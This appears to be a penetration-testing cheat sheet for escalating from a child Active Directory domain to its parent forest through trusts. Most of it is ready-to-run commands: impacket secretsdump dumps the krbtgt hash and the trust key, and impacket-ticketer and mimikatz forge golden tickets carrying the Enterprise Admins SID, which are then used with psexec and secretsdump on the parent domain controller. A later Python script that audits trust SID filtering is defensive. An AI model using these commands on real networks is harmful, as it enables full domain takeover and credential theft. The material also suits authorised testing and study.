
Enumerate Trusts

PowerShell

Get-ADTrust -Filter *
nltest /domain_trusts
([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetAllTrustRelationships()

PowerView

Get-DomainTrust
Get-DomainTrust -Domain parent.domain.local

BloodHound

Map → Domain Trusts view.

Trust Types

Type         | Direction                | Description
Parent-Child | Bidirectional            | Automatic between parent and child domains
Tree-Root    | Bidirectional            | Between trees in the same forest
External     | One-way or bidirectional | Between domains in different forests
Forest       | One-way or bidirectional | Between forest root domains

Parent-Child — Escalation via Golden Ticket

Child domain → parent domain: a golden ticket forged in the child carries the parent's Enterprise Admins SID in SID History, which the parent honours because SID filtering is not applied within a forest.

Get krbtgt from Child

impacket-secretsdump CHILD/admin:pass@CHILD_DC -just-dc-user krbtgt

Get Parent Domain SID

impacket-lookupsid CHILD/admin:pass@PARENT_DC

Forge Inter-Realm TGT

impacket-ticketer -nthash CHILD_KRBTGT_HASH -domain-sid CHILD_SID -domain child.domain.local -extra-sid S-1-5-21-PARENT-SID-519 administrator
RID 519 = Enterprise Admins (in the parent/forest root domain).

Use

export KRB5CCNAME=administrator.ccache
impacket-psexec child.domain.local/administrator@PARENT_DC -k -no-pass
impacket-secretsdump child.domain.local/administrator@PARENT_DC -k -no-pass

Mimikatz

kerberos::golden /user:Administrator /domain:child.domain.local /sid:CHILD_SID /krbtgt:CHILD_KRBTGT /sids:S-1-5-21-PARENT-SID-519 /ptt

Trust Key Attack

Use the inter-realm trust key (the hash of the PARENT$ trust account) instead of the child krbtgt hash to forge the inter-realm TGT.

Get Trust Key

impacket-secretsdump CHILD/admin:pass@CHILD_DC -just-dc-user 'PARENT$'

Forge

impacket-ticketer -nthash TRUST_KEY -domain-sid CHILD_SID -domain child.domain.local -extra-sid S-1-5-21-PARENT-SID-519 -spn krbtgt/PARENT.DOMAIN.LOCAL administrator

SID Filtering

  • Intra-forest trusts (parent-child, tree-root): SID filtering is not applied by default, so SID History crosses the trust
  • External/forest trusts: SID filtering is applied by default (blocks foreign SIDs in SID History)
  • Selective authentication: limits which users can authenticate across the trust
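An added auditing example, not from the original page: it decodes the trustAttributes bitmask (exposed as the TrustAttributes property of Get-ADTrust and printed as "Attr:" by nltest /domain_trusts) and reports which trusts would honour SID History, the precondition for the child-to-parent paths above. Flag values follow MS-ADTS section 6.1.6.7.9; the trust names and attribute values in SAMPLE are constructed.

```python
"""Audit Active Directory trusts for SID History exposure (constructed example)."""
from dataclasses import dataclass

# trustAttributes flag bits (MS-ADTS 6.1.6.7.9)
NON_TRANSITIVE = 0x0001
QUARANTINED_DOMAIN = 0x0004    # SID filtering enabled on an external trust
FOREST_TRANSITIVE = 0x0008     # forest trust
CROSS_ORGANIZATION = 0x0010    # selective authentication
WITHIN_FOREST = 0x0020         # parent-child or tree-root trust
USES_RC4_ENCRYPTION = 0x0080   # trust still negotiates RC4


@dataclass
class Trust:
    target: str       # DNS name of the trusted domain/forest
    attributes: int   # raw trustAttributes value


def classify(trust: Trust) -> dict:
    """Decode one trust into type, SID-filtering state and related flags."""
    a = trust.attributes
    if a & WITHIN_FOREST:
        # Intra-forest trusts never filter SIDs: SID History is honoured.
        kind, filtered = "intra-forest", False
    elif a & FOREST_TRANSITIVE:
        # Forest trusts apply forest-aware SID filtering by default.
        kind, filtered = "forest", True
    else:
        # External trusts filter only while the quarantine bit is set
        # (netdom trust /quarantine:no clears it).
        kind, filtered = "external", bool(a & QUARANTINED_DOMAIN)
    return {
        "target": trust.target,
        "type": kind,
        "sid_filtering": filtered,
        "selective_auth": bool(a & CROSS_ORGANIZATION),
        "uses_rc4": bool(a & USES_RC4_ENCRYPTION),
        "sid_history_honoured": not filtered,
    }


def audit(trusts: list) -> list:
    """Return the targets whose trust would honour injected SID History."""
    return [r["target"] for r in map(classify, trusts) if r["sid_history_honoured"]]


# Constructed sample resembling the page's lab, not real directory output.
SAMPLE = [
    Trust("child.domain.local", WITHIN_FOREST),                            # parent-child
    Trust("partner.example", QUARANTINED_DOMAIN),                          # external, quarantined
    Trust("legacy.example", USES_RC4_ENCRYPTION),                          # external, quarantine cleared
    Trust("otherforest.example", FOREST_TRANSITIVE | CROSS_ORGANIZATION),  # forest, selective auth
]

if __name__ == "__main__":
    for row in map(classify, SAMPLE):
        print(row)
    print("SID History honoured by:", audit(SAMPLE))
```

Feed it real values with `Get-ADTrust -Filter * | Select-Object Target,TrustAttributes` and review any trust listed as honouring SID History.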

Quick Reference

Task           | Command / Note
Enum trusts    | Get-ADTrust -Filter *
Child → Parent | Golden ticket with -extra-sid PARENT-519
Trust key      | secretsdump -just-dc-user 'PARENT$'
SID filtering  | Blocks SID History on external trusts